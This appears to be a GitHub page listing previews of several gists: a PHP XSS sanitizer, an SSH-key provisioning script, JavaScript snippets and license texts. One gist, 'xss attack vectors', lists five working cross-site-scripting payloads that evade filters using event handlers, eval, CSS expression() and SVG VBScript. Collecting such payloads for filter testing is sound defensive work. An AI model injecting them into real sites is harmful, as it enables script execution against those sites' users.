Skip to content

Instantly share code, notes, and snippets.

View mattpass's full-sized avatar

Matt Pass mattpass

78 followers · 10 following
View GitHub Profile
@soaj1664
soaj1664 / XSS Protection in 5 common contexts
Last active September 8, 2022 07:01
Per-Context Sanitizer Functions
<?php
/**
* XSS protection function for HTML context only
* @usecases
* <title>use this function if output reflects here or as a content of any HTML tag.</title>
* e.g., <span>use this function if output reflects here</span>
* e.g., <div>use this function if output reflects here</div>
* @description
* Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution.
@soaj1664
soaj1664 / xss attack vectors
Created March 16, 2014 19:46
<div style="color:rgb(''&#0;x:expression(alert(1))"></div>
<img/src=%00 id=confirm(1) onerror=eval(id)
<div id=confirm(1) onmouseover=eval(id)>X</div>
<span/onmouseover=confirm(1)>X</span>
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83)))
@mattwillsher
mattwillsher / grant_github_user_access
Last active May 4, 2023 12:03
A script to pull SSH keys for a give GitHub user and add those keys to the current users authorized_keys file.
#!/bin/bash
#
# (c)2014 Matt Willsher <[email protected]>
#
# Licensed under GPLv3 http://www.gnu.org/licenses/gpl.txt
#
umask 077
if [[ $EUID == 0 ]]; then
echo "This script can't be used as root" >&2
@bloodyowl
bloodyowl / gist:8460661
Last active January 3, 2016 12:09
global leaks
;(function(win){
var doc = win.document
, i = keys(doc.body.appendChild(doc.createElement("iframe")).contentWindow)
return keys(win).filter(function(a){return i.indexOf(a) == -1})
})(window)
@Prinzhorn
Prinzhorn / README.md
Last active December 25, 2015 22:59
QR code bookmarklet

Just add the snipped as a bookmarklet and instantly turn the current website's URL in a QR code. Very useful when you quickly want to open the page on mobile.

@dypsilon
dypsilon / frontendDevlopmentBookmarks.md
Last active November 16, 2025 11:36
A badass list of frontend development resources I collected over time.
@sindresorhus
sindresorhus / codestyle.md
Last active September 26, 2023 07:45
My preferred code style.

Code Style

  • Tab indentation
  • Single-quotes
  • Semicolon
  • Strict mode
  • No trailing whitespace
  • Multiple variable statements
  • Space after keywords and between arguments and operators
  • Return early
@sklppr
sklppr / twitter-friends.rb
Created September 13, 2012 15:26
Fetches info about the people you follow on Twitter and determines who you could/should unfollow.
# encoding: utf-8
#####################################################################################
#
# Fetches info about the people you follow on Twitter
# and determines who you could/should unfollow based on:
# - activity: was their last update more than 3 months ago?
# - popularity: do they have less than 25 followers?
# - mass following: are they following more than 10000 people?
@maettig
maettig / LICENSE.txt
Created January 18, 2012 19:06 — forked from 140bytes/LICENSE.txt
findDiffBetweenStrings in 140byt.es
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2012 Thiemo Mättig <http://maettig.com>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@maettig
maettig / LICENSE.txt
Created January 16, 2012 16:56 — forked from 140bytes/LICENSE.txt
dumpGlobalLeaks in 140byt.es
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2012 Thiemo Mättig <http://maettig.com>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE